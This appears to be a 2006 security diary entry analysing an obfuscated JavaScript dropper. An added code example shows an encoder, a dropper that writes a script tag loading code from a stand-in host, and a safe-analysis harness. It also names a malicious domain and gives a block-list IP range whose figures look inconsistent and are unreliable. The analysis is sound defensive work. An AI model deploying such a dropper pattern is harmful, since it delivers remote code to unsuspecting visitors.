Last Updated: 2006-10-31 21:00:38 UTC
by Daniel Wesemann (Version: 1)
Now, anyone can tell from looking at this that whoever wrote this code is trying to hide something. Gone are the days when simple substitutions (encoded B is an A, encoded C is a B, and so on) were used to hide the URL from which the next bit of nefarious code was pulled. Over the last months, attackers have apparently evolved beyond first-grade math to highly complex :) concoctions involving binary "shift" and "bitwise and" operations. Wow! The good news for the analyst has not changed, though: the script still has to decode the URL before it can use it, so the decoder sitting in front of you is also your decoder, provided you run it somewhere it cannot reach eval() or document.write().
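To make the point concrete, here is an added example of a toy "shift and bitwise-and" obfuscation scheme of the kind described above. This is not the sample from the diary and not the attacker's code; the scheme, the function names and the URL (js.example.invalid) are all hypothetical. It shows the encoder an attacker would run when building the page, the decoder the dropper ships to the victim's browser, and an analyst-side harness that runs the dropper with document.write replaced by a capture hook so the decoded URL is recovered without ever being fetched.

```javascript
// Added example, not code from the original diary. Hypothetical obfuscation
// scheme: each character code is shifted left 3 bits and the low 3 bits are
// filled with position-dependent noise, so the same letter never encodes to
// the same number twice. Decoding is a right shift and a mask, exactly the
// kind of "shift" and "bitwise and" arithmetic the text describes.

// Encoder (attacker's build step).
function obfuscate(s) {
  const out = [];
  for (let i = 0; i < s.length; i++) {
    out.push((s.charCodeAt(i) << 3) | (i & 7));
  }
  return out;
}

// Decoder, as shipped in the dropper: drop the 3 noise bits, mask to a byte.
function deobfuscate(nums) {
  let s = '';
  for (const n of nums) s += String.fromCharCode((n >> 3) & 0xff);
  return s;
}

// What the dropper does next: write a <script src=...> pointing at the
// decoded URL. In a real sample this is the eval()/document.write() line.
function buildDropper(nums) {
  return 'document.write(\'<script src="' + deobfuscate(nums) +
         '"></scr\' + \'ipt>\');';
}

// Analyst side: execute the dropper with 'document' shadowed by a fake whose
// write() only records its argument. new Function() keeps the code out of the
// caller's lexical scope; the parameter named 'document' shadows any global.
function analyzeSafely(dropperSource) {
  const captured = [];
  const fakeDocument = { write: (x) => captured.push(String(x)) };
  const fn = new Function('document', dropperSource);
  fn(fakeDocument);
  const urls = [];
  for (const s of captured) {
    const m = s.match(/https?:\/\/[^"'\s<>]+/g);
    if (m) urls.push(...m);
  }
  return { captured, urls };
}

// Constructed sample: a hypothetical payload location, not the real one.
const SAMPLE_URL = 'http://js.example.invalid/x.js';
const SAMPLE_NUMS = obfuscate(SAMPLE_URL);

// Stand-alone run: print what the dropper would have written and the URL(s)
// pulled out of it, without fetching anything.
const result = analyzeSafely(buildDropper(SAMPLE_NUMS));
console.log(result.captured[0]);
console.log(result.urls);
```

The shadowing trick is the whole point of the harness: nothing in the dropper changes, only the object its last line calls into. Keep in mind that real samples often reference window, location or navigator as well, so stub those the same way, and do it on a lab machine regardless, since a sample that detects the fake document can still do something you did not anticipate.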
The de-obfuscated URL goes to (don't click!) js.pceb.cc, which resolves to 18.104.22.168, which is, surprise, surprise, in the address range of INHoster in Ukraine. Although we are wary of excessive block-lists, we have repeatedly recommended in the past that you block this range (http://isc.sans.org/diary.php?storyid=997): 22.214.171.124 - 126.96.36.199. Do it now, and next time they dish up a new treat, it won't trick your users.
Caveat: Decode such critters only on a lab system. Careful malware analysts tend to reinstall their systems and change jobs far less often than those who think they've got it all down phat.